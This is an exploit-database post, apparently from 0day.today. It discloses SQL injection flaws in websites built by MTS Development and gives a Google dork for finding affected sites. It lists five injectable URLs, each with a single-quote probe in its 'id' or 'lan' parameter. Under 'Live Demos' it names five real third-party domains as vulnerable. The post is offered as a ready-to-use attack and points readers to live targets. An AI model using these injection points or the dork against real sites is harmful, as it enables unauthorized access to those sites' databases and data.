[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MTS Development Multiple SQl Injection

Author
DoSs-Dz
Risk
[
Security Risk High
]
0day-ID
0day-ID-18641
Category
web applications
Date add
15-06-2012
Platform
php
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0  |::> Site            : 1337day.com                                    0
1  |::> Support E-mail  : submit[@]1337day.com                           1
0                                                                        0
1               +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+                1
0               +I'm DoSs-Dz Member From Inj3ct0r Team  +                1
1               +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+                0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
+---------------------------------------------------------------------------------------------------+
|-> Author: DoSs-Dz   ( kHaled Ham )                                                                |
|-> Exploit Title : MTS Development Multiple SQl Injection                                          |
|-> Vendor Site  : http://www.mtsdevelopment.com                                                    |
|-> version : n/a                                                                                   |
|-> Date : I dont Know                                                                              |
|-> Google Dork : intext:"Powered by MTS Development" ?id=                                          |
|-> Big 10x T0 : Naila ( Creative girl From 47  )   [;)]                                            |
+---------------------------------------------------------------------------------------------------+
=> Exploit on : 

  1-> http://127.0.0.1/Site/contact.php?id=10&lan=2' 
   Fichier : contact.php 
   Parametre : lan
   
  2-> http://127.0.0.1/Site/articles.php?id=20' 
   Fichier : articles.php
   Parametre : id
   
  3-> http://127.0.0.1/Site/home.php?id=98' 
   Fichier : home.php  
   Parametre : id 
   
  4-> http://127.0.0.1/Site/property.php?lan=ar&id=7' 
   Fichier : property.php
   Parametre : id 
  
  5-> http://127.0.0.1/Site/index.php?id=1&lan=1' : SQl
   Fichier : index.php  
   Parametre : lan
  
  
=> Live Demos : 
 
 http://futurehouse-eg.com/property.php?lan=ar&id=7' -> [SQl pr0f]
 http://www.mtsdevelopment.com/index.php?id=1&lan=1' -> [SQl pr0f]
 http://www.newcooler.com/home.php?id=98' -> [SQl pr0f]
 http://www.egtce.com/contact.php?id=10&lan=2' -> [SQl pr0f]
 http://www.junior-radiotv.com/articles.php?id=20' -> [SQl pr0f]

+---------------------------------------------------------------------------------------------------+
|-> Spec!4l 10x 2 : Black-ID - Damane2011 - Robert Miles - BaC-Dz - Tn_Sploiter <3                  |
|-> Great'z : Sec4ever - is-sec.org - v4-team - vbspiders - all arab hack or security forum :)      |
|-> exploit-db.com - exploit4arab.com - 1337day.com                                                 |
+---------------------------------------------------------------------------------------------------+



#  0day.today [2024-07-07]  #